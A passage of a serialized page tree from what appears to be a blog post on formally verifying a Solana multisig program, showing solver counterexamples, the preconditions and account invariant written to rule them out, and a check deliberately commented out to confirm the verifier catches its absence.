,[26782],{"type":32,"value":12185},{"type":26,"tag":35,"props":26784,"children":26785},{},[26786],{"type":32,"value":26787},"Verification failed again! This time we get a different counterexample:",{"type":26,"tag":5512,"props":26789,"children":26791},{"code":26790},"threshold: 0\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[26792],{"type":26,"tag":130,"props":26793,"children":26794},{"__ignoreMap":7},[26795],{"type":32,"value":26790},{"type":26,"tag":35,"props":26797,"children":26798},{},[26799],{"type":32,"value":26800},"Aha! The threshold cannot be 0 either... Let's try again:",{"type":26,"tag":5512,"props":26802,"children":26804},{"code":26803,"language":5551,"meta":7,"className":5552,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n    && threshold != 0\n)]\npub fn create(...) { ... }\n",[26805],{"type":26,"tag":130,"props":26806,"children":26807},{"__ignoreMap":7},[26808,26815,26850,26871,26878],{"type":26,"tag":137,"props":26809,"children":26810},{"class":5559,"line":5560},[26811],{"type":26,"tag":137,"props":26812,"children":26813},{"style":5601},[26814],{"type":32,"value":26703},{"type":26,"tag":137,"props":26816,"children":26817},{"class":5559,"line":5412},[26818,26822,26826,26830,26834,26838,26842,26846],{"type":26,"tag":137,"props":26819,"children":26820},{"style":5601},[26821],{"type":32,"value":26711},{"type":26,"tag":137,"props":26823,"children":26824},{"style":5573},[26825],{"type":32,"value":11428},{"type":26,"tag":137,"props":26827,"children":26828},{"style":6009},[26829],{"type":32,"value":16322},{"type":26,"tag":137,"props":26831,"children":26832},{"style":5601},[26833],{"type":32,"value":5671},{"type":26,"tag":137,"props":26835,"children":26836},{"style":5590},[26837],{"type":32,"value":22007},{"type":26,"tag":137,"props":26839,"children":26840},{"style":5601},[26841],{"type":32,"value":25964},{"type":26,"tag":137,"props":26843,"children":26844},{"style":5590},[26845],{"type":32,"value":470},{"type":26,"tag":137,"props":26847,"children":26848},{"style":5601},[26849],{"type":32,"value":26740},{"type":26,"tag":137,"props":26851,"children":26852},{"class":5559,"line":5417},[26853,26857,26862,26866],{"type":26,"tag":137,"props":26854,"children":26855},{"style":5590},[26856],{"type":32,"value":18213},{"type":26,"tag":137,"props":26858,"children":26859},{"style":5601},[26860],{"type":32,"value":26861}," threshold ",{"type":26,"tag":137,"props":26863,"children":26864},{"style":5590},[26865],{"type":32,"value":18280},{"type":26,"tag":137,"props":26867,"children":26868},{"style":5601},[26869],{"type":32,"value":26870}," 0\n",{"type":26,"tag":137,"props":26872,"children":26873},{"class":5559,"line":5642},[26874],{"type":26,"tag":137,"props":26875,"children":26876},{"style":5601},[26877],{"type":32,"value":22852},{"type":26,"tag":137,"props":26879,"children":26880},{"class":5559,"line":5745},[26881,26885,26889,26893,26897,26901,26905,26909],{"type":26,"tag":137,"props":26882,"children":26883},{"style":5573},[26884],{"type":32,"value":16281},{"type":26,"tag":137,"props":26886,"children":26887},{"style":5573},[26888],{"type":32,"value":16286},{"type":26,"tag":137,"props":26890,"children":26891},{"style":5682},[26892],{"type":32,"value":9696},{"type":26,"tag":137,"props":26894,"children":26895},{"style":5601},[26896],{"type":32,"value":165},{"type":26,"tag":137,"props":26898,"children":26899},{"style":5590},[26900],{"type":32,"value":12180},{"type":26,"tag":137,"props":26902,"children":26903},{"style":5601},[26904],{"type":32,"value":26580},{"type":26,"tag":137,"props":26906,"children":26907},{"style":5590},[26908],{"type":32,"value":12180},{"type":26,"tag":137,"props":26910,"children":26911},{"style":5601},[26912],{"type":32,"value":12185},{"type":26,"tag":35,"props":26914,"children":26915},{},[26916],{"type":32,"value":26917},"A third counterexample:",{"type":26,"tag":5512,"props":26919,"children":26921},{"code":26920},"threshold: 4\ncreate_key: ...\nmembers: SparseVec { size: 536870920 }\n",[26922],{"type":26,"tag":130,"props":26923,"children":26924},{"__ignoreMap":7},[26925],{"type":32,"value":26920},{"type":26,"tag":35,"props":26927,"children":26928},{},[26929,26931,26937],{"type":32,"value":26930},"Here we see the size of our ",{"type":26,"tag":130,"props":26932,"children":26934},{"className":26933},[],[26935],{"type":32,"value":26936},"members",{"type":32,"value":26938}," vec is huge! We need to constrain that to be less than u16::MAX:",{"type":26,"tag":5512,"props":26940,"children":26942},{"code":26941,"language":5551,"meta":7,"className":5552,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n    && (threshold != 0)\n    && (members.len() \u003C= (u16::MAX as usize))\n)]\npub fn create(...) { ... }\n",[26943],{"type":26,"tag":130,"props":26944,"children":26945},{"__ignoreMap":7},[26946,26953,26988,27009,27061,27068],{"type":26,"tag":137,"props":26947,"children":26948},{"class":5559,"line":5560},[26949],{"type":26,"tag":137,"props":26950,"children":26951},{"style":5601},[26952],{"type":32,"value":26703},{"type":26,"tag":137,"props":26954,"children":26955},{"class":5559,"line":5412},[26956,26960,26964,26968,26972,26976,26980,26984],{"type":26,"tag":137,"props":26957,"children":26958},{"style":5601},[26959],{"type":32,"value":26711},{"type":26,"tag":137,"props":26961,"children":26962},{"style":5573},[26963],{"type":32,"value":11428},{"type":26,"tag":137,"props":26965,"children":26966},{"style":6009},[26967],{"type":32,"value":16322},{"type":26,"tag":137,"props":26969,"children":26970},{"style":5601},[26971],{"type":32,"value":5671},{"type":26,"tag":137,"props":26973,"children":26974},{"style":5590},[26975],{"type":32,"value":22007},{"type":26,"tag":137,"props":26977,"children":26978},{"style":5601},[26979],{"type":32,"value":25964},{"type":26,"tag":137,"props":26981,"children":26982},{"style":5590},[26983],{"type":32,"value":470},{"type":26,"tag":137,"props":26985,"children":26986},{"style":5601},[26987],{"type":32,"value":26740},{"type":26,"tag":137,"props":26989,"children":26990},{"class":5559,"line":5417},[26991,26995,27000,27004],{"type":26,"tag":137,"props":26992,"children":26993},{"style":5590},[26994],{"type":32,"value":18213},{"type":26,"tag":137,"props":26996,"children":26997},{"style":5601},[26998],{"type":32,"value":26999}," (threshold ",{"type":26,"tag":137,"props":27001,"children":27002},{"style":5590},[27003],{"type":32,"value":18280},{"type":26,"tag":137,"props":27005,"children":27006},{"style":5601},[27007],{"type":32,"value":27008}," 0)\n",{"type":26,"tag":137,"props":27010,"children":27011},{"class":5559,"line":5642},[27012,27016,27020,27024,27028,27032,27036,27041,27045,27049,27053,27057],{"type":26,"tag":137,"props":27013,"children":27014},{"style":5590},[27015],{"type":32,"value":18213},{"type":26,"tag":137,"props":27017,"children":27018},{"style":5601},[27019],{"type":32,"value":25578},{"type":26,"tag":137,"props":27021,"children":27022},{"style":5590},[27023],{"type":32,"value":470},{"type":26,"tag":137,"props":27025,"children":27026},{"style":5601},[27027],{"type":32,"value":23614},{"type":26,"tag":137,"props":27029,"children":27030},{"style":5590},[27031],{"type":32,"value":22007},{"type":26,"tag":137,"props":27033,"children":27034},{"style":5601},[27035],{"type":32,"value":4625},{"type":26,"tag":137,"props":27037,"children":27038},{"style":6009},[27039],{"type":32,"value":27040},"u16",{"type":26,"tag":137,"props":27042,"children":27043},{"style":5590},[27044],{"type":32,"value":6072},{"type":26,"tag":137,"props":27046,"children":27047},{"style":6009},[27048],{"type":32,"value":23632},{"type":26,"tag":137,"props":27050,"children":27051},{"style":5573},[27052],{"type":32,"value":11414},{"type":26,"tag":137,"props":27054,"children":27055},{"style":6009},[27056],{"type":32,"value":16322},{"type":26,"tag":137,"props":27058,"children":27059},{"style":5601},[27060],{"type":32,"value":22305},{"type":26,"tag":137,"props":27062,"children":27063},{"class":5559,"line":5745},[27064],{"type":26,"tag":137,"props":27065,"children":27066},{"style":5601},[27067],{"type":32,"value":22852},{"type":26,"tag":137,"props":27069,"children":27070},{"class":5559,"line":5850},[27071,27075,27079,27083,27087,27091,27095,27099],{"type":26,"tag":137,"props":27072,"children":27073},{"style":5573},[27074],{"type":32,"value":16281},{"type":26,"tag":137,"props":27076,"children":27077},{"style":5573},[27078],{"type":32,"value":16286},{"type":26,"tag":137,"props":27080,"children":27081},{"style":5682},[27082],{"type":32,"value":9696},{"type":26,"tag":137,"props":27084,"children":27085},{"style":5601},[27086],{"type":32,"value":165},{"type":26,"tag":137,"props":27088,"children":27089},{"style":5590},[27090],{"type":32,"value":12180},{"type":26,"tag":137,"props":27092,"children":27093},{"style":5601},[27094],{"type":32,"value":26580},{"type":26,"tag":137,"props":27096,"children":27097},{"style":5590},[27098],{"type":32,"value":12180},{"type":26,"tag":137,"props":27100,"children":27101},{"style":5601},[27102],{"type":32,"value":12185},{"type":26,"tag":35,"props":27104,"children":27105},{},[27106],{"type":32,"value":27107},"And now we get:",{"type":26,"tag":5512,"props":27109,"children":27111},{"code":27110},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.6634517s\n",[27112],{"type":26,"tag":130,"props":27113,"children":27114},{"__ignoreMap":7},[27115],{"type":32,"value":27110},{"type":26,"tag":35,"props":27117,"children":27118},{},[27119],{"type":32,"value":27120},"🥳🥳🥳",{"type":26,"tag":35,"props":27122,"children":27123},{},[27124],{"type":32,"value":27125},"The attentive reader may have noticed that we didn't need to verify this condition:",{"type":26,"tag":5512,"props":27127,"children":27129},{"code":27128,"language":5551,"meta":7,"className":5552,"style":7},"if total_members \u003C 1 {\n    return err!(MsError::EmptyMembers);\n}\n",[27130],{"type":26,"tag":130,"props":27131,"children":27132},{"__ignoreMap":7},[27133,27156,27187],{"type":26,"tag":137,"props":27134,"children":27135},{"class":5559,"line":5560},[27136,27140,27144,27148,27152],{"type":26,"tag":137,"props":27137,"children":27138},{"style":5610},[27139],{"type":32,"value":18171},{"type":26,"tag":137,"props":27141,"children":27142},{"style":5584},[27143],{"type":32,"value":26043},{"type":26,"tag":137,"props":27145,"children":27146},{"style":5590},[27147],{"type":32,"value":11305},{"type":26,"tag":137,"props":27149,"children":27150},{"style":5626},[27151],{"type":32,"value":7104},{"type":26,"tag":137,"props":27153,"children":27154},{"style":5601},[27155],{"type":32,"value":5875},{"type":26,"tag":137,"props":27157,"children":27158},{"class":5559,"line":5412},[27159,27163,27167,27171,27175,27179,27183],{"type":26,"tag":137,"props":27160,"children":27161},{"style":5610},[27162],{"type":32,"value":19582},{"type":26,"tag":137,"props":27164,"children":27165},{"style":5682},[27166],{"type":32,"value":26099},{"type":26,"tag":137,"props":27168,"children":27169},{"style":5601},[27170],{"type":32,"value":165},{"type":26,"tag":137,"props":27172,"children":27173},{"style":6009},[27174],{"type":32,"value":26108},{"type":26,"tag":137,"props":27176,"children":27177},{"style":5590},[27178],{"type":32,"value":6072},{"type":26,"tag":137,"props":27180,"children":27181},{"style":6009},[27182],{"type":32,"value":26117},{"type":26,"tag":137,"props":27184,"children":27185},{"style":5601},[27186],{"type":32,"value":6430},{"type":26,"tag":137,"props":27188,"children":27189},{"class":5559,"line":5417},[27190],{"type":26,"tag":137,"props":27191,"children":27192},{"style":5601},[27193],{"type":32,"value":6507},{"type":26,"tag":35,"props":27195,"children":27196},{},[27197,27199,27205,27207,27212,27214,27219,27221,27226],{"type":32,"value":27198},"In this case this is actually redundant because if ",{"type":26,"tag":130,"props":27200,"children":27202},{"className":27201},[],[27203],{"type":32,"value":27204},"members.len() == 0",{"type":32,"value":27206}," then our threshold would also have to be ",{"type":26,"tag":130,"props":27208,"children":27210},{"className":27209},[],[27211],{"type":32,"value":1817},{"type":32,"value":27213}," (and our ",{"type":26,"tag":130,"props":27215,"children":27217},{"className":27216},[],[27218],{"type":32,"value":25329},{"type":32,"value":27220}," is not allowed to be ",{"type":26,"tag":130,"props":27222,"children":27224},{"className":27223},[],[27225],{"type":32,"value":1817},{"type":32,"value":27227},"). The solver realizes that this situation is impossible and therefore the expression we have above is sufficient!",{"type":26,"tag":118,"props":27229,"children":27231},{"id":27230},"_2-verify-threshold-requirements",[27232],{"type":32,"value":27233},"2. Verify threshold requirements",{"type":26,"tag":35,"props":27235,"children":27236},{},[27237],{"type":32,"value":27238},"A critical security property for multisigs is that the threshold should never be zero (which would let anyone issue transactions) and the threshold should never be greater than the number of members (which would let nobody issue transactions).",{"type":26,"tag":35,"props":27240,"children":27241},{},[27242,27244,27248],{"type":32,"value":27243},"Unlike the previous example, we want to verify this in ",{"type":26,"tag":762,"props":27245,"children":27246},{},[27247],{"type":32,"value":11889},{"type":32,"value":27249}," cases. I.e. any instruction that could mutate the multisig account.",{"type":26,"tag":35,"props":27251,"children":27252},{},[27253,27255,27259,27261,27266],{"type":32,"value":27254},"In this case, we want to model this as an ",{"type":26,"tag":762,"props":27256,"children":27257},{},[27258],{"type":32,"value":24358},{"type":32,"value":27260}," on the ",{"type":26,"tag":130,"props":27262,"children":27264},{"className":27263},[],[27265],{"type":32,"value":25321},{"type":32,"value":27267}," account struct:",{"type":26,"tag":5512,"props":27269,"children":27271},{"code":27270,"language":5551,"meta":7,"className":5552,"style":7},"#[account]\n#[derive(Clone, Debug)]\n#[invariant(\n    (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n    pub threshold: u16,               // threshold for signatures\n    pub authority_index: u16,         // index to seed other authorities under this multisig\n    pub transaction_index: u32,       // look up and seed reference for transactions\n    pub ms_change_index: u32,         // the last executed/closed transaction\n    pub bump: u8,                     // bump for the multisig seed\n    pub create_key: Pubkey,           // random key(or not) used to seed the multisig pda\n    pub allow_external_execute: bool, // allow non-member keys to execute txs\n    pub keys: Vec\u003CPubkey>,            // keys of the members\n}\n",[27272],{"type":26,"tag":130,"props":27273,"children":27274},{"__ignoreMap":7},[27275,27282,27307,27314,27338,27389,27396,27415,27442,27469,27496,27523,27550,27577,27604,27639],{"type":26,"tag":137,"props":27276,"children":27277},{"class":5559,"line":5560},[27278],{"type":26,"tag":137,"props":27279,"children":27280},{"style":5601},[27281],{"type":32,"value":23363},{"type":26,"tag":137,"props":27283,"children":27284},{"class":5559,"line":5412},[27285,27289,27294,27298,27303],{"type":26,"tag":137,"props":27286,"children":27287},{"style":5601},[27288],{"type":32,"value":25417},{"type":26,"tag":137,"props":27290,"children":27291},{"style":6009},[27292],{"type":32,"value":27293},"Clone",{"type":26,"tag":137,"props":27295,"children":27296},{"style":5601},[27297],{"type":32,"value":1108},{"type":26,"tag":137,"props":27299,"children":27300},{"style":6009},[27301],{"type":32,"value":27302},"Debug",{"type":26,"tag":137,"props":27304,"children":27305},{"style":5601},[27306],{"type":32,"value":22852},{"type":26,"tag":137,"props":27308,"children":27309},{"class":5559,"line":5417},[27310],{"type":26,"tag":137,"props":27311,"children":27312},{"style":5601},[27313],{"type":32,"value":23371},{"type":26,"tag":137,"props":27315,"children":27316},{"class":5559,"line":5642},[27317,27322,27326,27330,27334],{"type":26,"tag":137,"props":27318,"children":27319},{"style":5601},[27320],{"type":32,"value":27321},"    (self",{"type":26,"tag":137,"props":27323,"children":27324},{"style":5590},[27325],{"type":32,"value":470},{"type":26,"tag":137,"props":27327,"children":27328},{"style":5601},[27329],{"type":32,"value":23664},{"type":26,"tag":137,"props":27331,"children":27332},{"style":5590},[27333],{"type":32,"value":12533},{"type":26,"tag":137,"props":27335,"children":27336},{"style":5601},[27337],{"type":32,"value":23673},{"type":26,"tag":137,"props":27339,"children":27340},{"class":5559,"line":5745},[27341,27345,27349,27353,27357,27361,27365,27369,27373,27377,27381,27385],{"type":26,"tag":137,"props":27342,"children":27343},{"style":5590},[27344],{"type":32,"value":18213},{"type":26,"tag":137,"props":27346,"children":27347},{"style":5601},[27348],{"type":32,"value":23597},{"type":26,"tag":137,"props":27350,"children":27351},{"style":5590},[27352],{"type":32,"value":470},{"type":26,"tag":137,"props":27354,"children":27355},{"style":5601},[27356],{"type":32,"value":23664},{"type":26,"tag":137,"props":27358,"children":27359},{"style":5573},[27360],{"type":32,"value":11428},{"type":26,"tag":137,"props":27362,"children":27363},{"style":6009},[27364],{"type":32,"value":16322},{"type":26,"tag":137,"props":27366,"children":27367},{"style":5590},[27368],{"type":32,"value":10782},{"type":26,"tag":137,"props":27370,"children":27371},{"style":5601},[27372],{"type":32,"value":16388},{"type":26,"tag":137,"props":27374,"children":27375},{"style":5590},[27376],{"type":32,"value":470},{"type":26,"tag":137,"props":27378,"children":27379},{"style":5601},[27380],{"type":32,"value":23576},{"type":26,"tag":137,"props":27382,"children":27383},{"style":5590},[27384],{"type":32,"value":470},{"type":26,"tag":137,"props":27386,"children":27387},{"style":5601},[27388],{"type":32,"value":23725},{"type":26,"tag":137,"props":27390,"children":27391},{"class":5559,"line":5850},[27392],{"type":26,"tag":137,"props":27393,"children":27394},{"style":5601},[27395],{"type":32,"value":22852},{"type":26,"tag":137,"props":27397,"children":27398},{"class":5559,"line":5878},[27399,27403,27407,27411],{"type":26,"tag":137,"props":27400,"children":27401},{"style":5573},[27402],{"type":32,"value":16281},{"type":26,"tag":137,"props":27404,"children":27405},{"style":5573},[27406],{"type":32,"value":23744},{"type":26,"tag":137,"props":27408,"children":27409},{"style":6009},[27410],{"type":32,"value":23749},{"type":26,"tag":137,"props":27412,"children":27413},{"style":5601},[27414],{"type":32,"value":5875},{"type":26,"tag":137,"props":27416,"children":27417},{"class":5559,"line":5891},[27418,27422,27426,27430,27434,27438],{"type":26,"tag":137,"props":27419,"children":27420},{"style":5573},[27421],{"type":32,"value":23436},{"type":26,"tag":137,"props":27423,"children":27424},{"style":5584},[27425],{"type":32,"value":23765},{"type":26,"tag":137,"props":27427,"children":27428},{"style":5590},[27429],{"type":32,"value":7072},{"type":26,"tag":137,"props":27431,"children":27432},{"style":6009},[27433],{"type":32,"value":23623},{"type":26,"tag":137,"props":27435,"children":27436},{"style":5601},[27437],{"type":32,"value":23778},{"type":26,"tag":137,"props":27439,"children":27440},{"style":5564},[27441],{"type":32,"value":23783},{"type":26,"tag":137,"props":27443,"children":27444},{"class":5559,"line":5909},[27445,27449,27453,27457,27461,27465],{"type":26,"tag":137,"props":27446,"children":27447},{"style":5573},[27448],{"type":32,"value":23436},{"type":26,"tag":137,"props":27450,"children":27451},{"style":5584},[27452],{"type":32,"value":23795},{"type":26,"tag":137,"props":27454,"children":27455},{"style":5590},[27456],{"type":32,"value":7072},{"type":26,"tag":137,"props":27458,"children":27459},{"style":6009},[27460],{"type":32,"value":23623},{"type":26,"tag":137,"props":27462,"children":27463},{"style":5601},[27464],{"type":32,"value":23808},{"type":26,"tag":137,"props":27466,"children":27467},{"style":5564},[27468],{"type":32,"value":23813},{"type":26,"tag":137,"props":27470,"children":27471},{"class":5559,"line":5930},[27472,27476,27480,27484,27488,27492],{"type":26,"tag":137,"props":27473,"children":27474},{"style":5573},[27475],{"type":32,"value":23436},{"type":26,"tag":137,"props":27477,"children":27478},{"style":5584},[27479],{"type":32,"value":23825},{"type":26,"tag":137,"props":27481,"children":27482},{"style":5590},[27483],{"type":32,"value":7072},{"type":26,"tag":137,"props":27485,"children":27486},{"style":6009},[27487],{"type":32,"value":20141},{"type":26,"tag":137,"props":27489,"children":27490},{"style":5601},[27491],{"type":32,"value":23838},{"type":26,"tag":137,"props":27493,"children":27494},{"style":5564},[27495],{"type":32,"value":23843},{"type":26,"tag":137,"props":27497,"children":27498},{"class":5559,"line":5939},[27499,27503,27507,27511,27515,27519],{"type":26,"tag":137,"props":27500,"children":27501},{"style":5573},[27502],{"type":32,"value":23436},{"type":26,"tag":137,"props":27504,"children":27505},{"style":5584},[27506],{"type":32,"value":23855},{"type":26,"tag":137,"props":27508,"children":27509},{"style":5590},[27510],{"type":32,"value":7072},{"type":26,"tag":137,"props":27512,"children":27513},{"style":6009},[27514],{"type":32,"value":20141},{"type":26,"tag":137,"props":27516,"children":27517},{"style":5601},[27518],{"type":32,"value":23808},{"type":26,"tag":137,"props":27520,"children":27521},{"style":5564},[27522],{"type":32,"value":23872},{"type":26,"tag":137,"props":27524,"children":27525},{"class":5559,"line":6191},[27526,27530,27534,27538,27542,27546],{"type":26,"tag":137,"props":27527,"children":27528},{"style":5573},[27529],{"type":32,"value":23436},{"type":26,"tag":137,"props":27531,"children":27532},{"style":5584},[27533],{"type":32,"value":23884},{"type":26,"tag":137,"props":27535,"children":27536},{"style":5590},[27537],{"type":32,"value":7072},{"type":26,"tag":137,"props":27539,"children":27540},{"style":6009},[27541],{"type":32,"value":17225},{"type":26,"tag":137,"props":27543,"children":27544},{"style":5601},[27545],{"type":32,"value":23897},{"type":26,"tag":137,"props":27547,"children":27548},{"style":5564},[27549],{"type":32,"value":23902},{"type":26,"tag":137,"props":27551,"children":27552},{"class":5559,"line":6208},[27553,27557,27561,27565,27569,27573],{"type":26,"tag":137,"props":27554,"children":27555},{"style":5573},[27556],{"type":32,"value":23436},{"type":26,"tag":137,"props":27558,"children":27559},{"style":5584},[27560],{"type":32,"value":23914},{"type":26,"tag":137,"props":27562,"children":27563},{"style":5590},[27564],{"type":32,"value":7072},{"type":26,"tag":137,"props":27566,"children":27567},{"style":6009},[27568],{"type":32,"value":23450},{"type":26,"tag":137,"props":27570,"children":27571},{"style":5601},[27572],{"type":32,"value":23927},{"type":26,"tag":137,"props":27574,"children":27575},{"style":5564},[27576],{"type":32,"value":23932},{"type":26,"tag":137,"props":27578,"children":27579},{"class":5559,"line":6225},[27580,27584,27588,27592,27596,27600],{"type":26,"tag":137,"props":27581,"children":27582},{"style":5573},[27583],{"type":32,"value":23436},{"type":26,"tag":137,"props":27585,"children":27586},{"style":5584},[27587],{"type":32,"value":23944},{"type":26,"tag":137,"props":27589,"children":27590},{"style":5590},[27591],{"type":32,"value":7072},{"type":26,"tag":137,"props":27593,"children":27594},{"style":6009},[27595],{"type":32,"value":14641},{"type":26,"tag":137,"props":27597,"children":27598},{"style":5601},[27599],{"type":32,"value":1108},{"type":26,"tag":137,"props":27601,"children":27602},{"style":5564},[27603],{"type":32,"value":23961},{"type":26,"tag":137,"props":27605,"children":27606},{"class":5559,"line":6238},[27607,27611,27615,27619,27623,27627,27631,27635],{"type":26,"tag":137,"props":27608,"children":27609},{"style":5573},[27610],{"type":32,"value":23436},{"type":26,"tag":137,"props":27612,"children":27613},{"style":5584},[27614],{"type":32,"value":23973},{"type":26,"tag":137,"props":27616,"children":27617},{"style":5590},[27618],{"type":32,"value":7072},{"type":26,"tag":137,"props":27620,"children":27621},{"style":6009},[27622],{"type":32,"value":23982},{"type":26,"tag":137,"props":27624,"children":27625},{"style":5601},[27626],{"type":32,"value":8391},{"type":26,"tag":137,"props":27628,"children":27629},{"style":6009},[27630],{"type":32,"value":23991},{"type":26,"tag":137,"props":27632,"children":27633},{"style":5601},[27634],{"type":32,"value":23996},{"type":26,"tag":137,"props":27636,"children":27637},{"style":5564},[27638],{"type":32,"value":24001},{"type":26,"tag":137,"props":27640,"children":27641},{"class":5559,"line":6247},[27642],{"type":26,"tag":137,"props":27643,"children":27644},{"style":5601},[27645],{"type":32,"value":6507},{"type":26,"tag":35,"props":27647,"children":27648},{},[27649,27651,27656],{"type":32,"value":27650},"Our verification framework will generate an invariant harness for each instruction. Instructions that can potentially modify the ",{"type":26,"tag":130,"props":27652,"children":27654},{"className":27653},[],[27655],{"type":32,"value":25321},{"type":32,"value":27657}," object will be checked to ensure that the invariant still holds after modification.",{"type":26,"tag":35,"props":27659,"children":27660},{},[27661,27663,27668],{"type":32,"value":27662},"Let's try this on the ",{"type":26,"tag":130,"props":27664,"children":27666},{"className":27665},[],[27667],{"type":32,"value":25400},{"type":32,"value":27669}," instruction that we've already seen:",{"type":26,"tag":5512,"props":27671,"children":27673},{"code":27672},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.8006988s\n",[27674],{"type":26,"tag":130,"props":27675,"children":27676},{"__ignoreMap":7},[27677],{"type":32,"value":27672},{"type":26,"tag":35,"props":27679,"children":27680},{},[27681,27683,27688],{"type":32,"value":27682},"To ensure this is working, we can test by commenting out this check from ",{"type":26,"tag":130,"props":27684,"children":27686},{"className":27685},[],[27687],{"type":32,"value":25400},{"type":32,"value":7072},{"type":26,"tag":5512,"props":27690,"children":27692},{"code":27691,"language":5551,"meta":7,"className":5552,"style":7},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n//     return err!(MsError::InvalidThreshold);\n// }\n",[27693],{"type":26,"tag":130,"props":27694,"children":27695},{"__ignoreMap":7},[27696,27704,27712],{"type":26,"tag":137,"props":27697,"children":27698},{"class":5559,"line":5560},[27699],{"type":26,"tag":137,"props":27700,"children":27701},{"style":5564},[27702],{"type":32,"value":27703},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n",{"type":26,"tag":137,"props":27705,"children":27706},{"class":5559,"line":5412},[27707],{"type":26,"tag":137,"props":27708,"children":27709},{"style":5564},[27710],{"type":32,"value":27711},"//     return err!(MsError::InvalidThreshold);\n",{"type":26,"tag":137,"props":27713,"children":27714},{"class":5559,"line":5417},[27715],{"type":26,"tag":137,"props":27716,"children":27717},{"style":5564},[27718],{"type":32,"value":27719},"// }\n",{"type":26,"tag":35,"props":27721,"children":27722},{},[27723],{"type":32,"value":27724},"And run again:",{"type":26,"tag":5512,"props":27726,"children":27728},{"code":27727},"VERIFICATION:- FAILED\nVerification Time: 8.245743s\n",[27729],{"type":26,"tag":130,"props":27730,"children":27731},{"__ignoreMap":7},[27732],{"type":32,"value":27727},{"type":26,"tag":35,"props":27734,"children":27735},{},[27736],{"type":32,"value":27737},"We get the following counterexample:",{"type":26,"tag":5512,"props":27739,"children":27741},{"code":27740,"language":5551,"meta":7,"className":5552,"style":7},"Account {\n    account: Ms {\n        threshold: 32768,\n        authority_index: 1,\n        transaction_index: 0,\n        ms_change_index: 0,\n        bump: 0,\n        create_key: ...,\n        allow_external_execute: false,\n        keys: SparseVec {\n            size: 5112,\n        },\n    },\n    info: AccountInfo { ... },\n}\n",[27742],{"type":26,"tag":130,"props":27743,"children":27744},{"__ignoreMap":7},[27745,27756,27776,27796,27816,27836,27856,27876,27896,27916,27937,27958,27966,27974,28004],{"type":26,"tag":137,"props":27746,"children":27747},{"class":5559,"line":5560},[27748,27752],{"type":26,"tag":137,"props":27749,"children":27750},{"style":6009},[27751],{"type":32,"value":19739},{"type":26,"tag":137,"props":27753,"children":27754},{"style":5601},[27755],{"type":32,"value":5875},{"type":26,"tag":137,"props":27757,"children":27758},{"class":5559,"line":5412},[27759,27764,27768,27772],{"type":26,"tag":137,"props":27760,"children":27761},{"style":5584},[27762],{"type":32,"value":27763},"    account",{"type":26,"tag":137,"props":27765,"children":27766},{"style":5590},[27767],{"type":32,"value":7072},{"type":26,"tag":137,"props":27769,"children":27770},{"style":6009},[27771],{"type":32,"value":23749},{"type":26,"tag":137,"props":27773,"children":27774},{"style":5601},[27775],{"type":32,"value":5875},{"type":26,"tag":137,"props":27777,"children":27778},{"class":5559,"line":5417},[27779,27783,27787,27792],{"type":26,"tag":137,"props":27780,"children":27781},{"style":5584},[27782],{"type":32,"value":26417},{"type":26,"tag":137,"props":27784,"children":27785},{"style":5590},[27786],{"type":32,"value":7072},{"type":26,"tag":137,"props":27788,"children":27789},{"style":5626},[27790],{"type":32,"value":27791}," 32768",{"type":26,"tag":137,"props":27793,"children":27794},{"style":5601},[27795],{"type":32,"value":6099},{"type":26,"tag":137,"props":27797,"children":27798},{"class":5559,"line":5642},[27799,27804,27808,27812],{"type":26,"tag":137,"props":27800,"children":27801},{"style":5584},[27802],{"type":32,"value":27803},"        authority_index",{"type":26,"tag":137,"props":27805,"children":27806},{"style":5590},[27807],{"type":32,"value":7072},{"type":26,"tag":137,"props":27809,"children":27810},{"style":5626},[27811],{"type":32,"value":7104},{"type":26,"tag":137,"props":27813,"children":27814},{"style":5601},[27815],{"type":32,"value":6099},{"type":26,"tag":137,"props":27817,"children":27818},{"class":5559,"line":5745},[27819,27824,27828,27832],{"type":26,"tag":137,"props":27820,"children":27821},{"style":5584},[27822],{"type":32,"value":27823},"        transaction_index",{"type":26,"tag":137,"props":27825,"children":27826},{"style":5590},[27827],{"type":32,"value":7072},{"type":26,"tag":137,"props":27829,"children":27830},{"style":5626},[27831],{"type":32,"value":5629},{"type":26,"tag":137,"props":27833,"children":27834},{"style":5601},[27835],{"type":32,"value":6099},{"type":26,"tag":137,"props":27837,"children":27838},{"class":5559,"line":5850},[27839,27844,27848,27852],{"type":26,"tag":137,"props":27840,"children":27841},{"style":5584},[27842],{"type":32,"value":27843},"        ms_change_index",{"type":26,"tag":137,"props":27845,"children":27846},{"style":5590},[27847],{"type":32,"value":7072},{"type":26,"tag":137,"props":27849,"children":27850},{"style":5626},[27851],{"type":32,"value":5629},{"type":26,"tag":137,"props":27853,"children":27854},{"style":5601},[27855],{"type":32,"value":6099},{"type":26,"tag":137,"props":27857,"children":27858},{"class":5559,"line":5878},[27859,27864,27868,27872],{"type":26,"tag":137,"props":27860,"children":27861},{"style":5584},[27862],{"type":32,"value":27863},"        bump",{"type":26,"tag":137,"props":27865,"children":27866},{"style":5590},[27867],{"type":32,"value":7072},{"type":26,"tag":137,"props":27869,"children":27870},{"style":5626},[27871],{"type":32,"value":5629},{"type":26,"tag":137,"props":27873,"children":27874},{"style":5601},[27875],{"type":32,"value":6099},{"type":26,"tag":137,"props":27877,"children":27878},{"class":5559,"line":5891},[27879,27883,27887,27892],{"type":26,"tag":137,"props":27880,"children":27881},{"style":5584},[27882],{"type":32,"value":26430},{"type":26,"tag":137,"props":27884,"children":27885},{"style":5590},[27886],{"type":32,"value":7072},{"type":26,"tag":137,"props":27888,"children":27889},{"style":5590},[27890],{"type":32,"value":27891}," ...",{"type":26,"tag":137,"props":27893,"children":27894},{"style":5601},[27895],{"type":32,"value":6099},{"type":26,"tag":137,"props":27897,"children":27898},{"class":5559,"line":5909},[27899,27904,27908,27912],{"type":26,"tag":137,"props":27900,"children":27901},{"style":5584},[27902],{"type":32,"value":27903},"        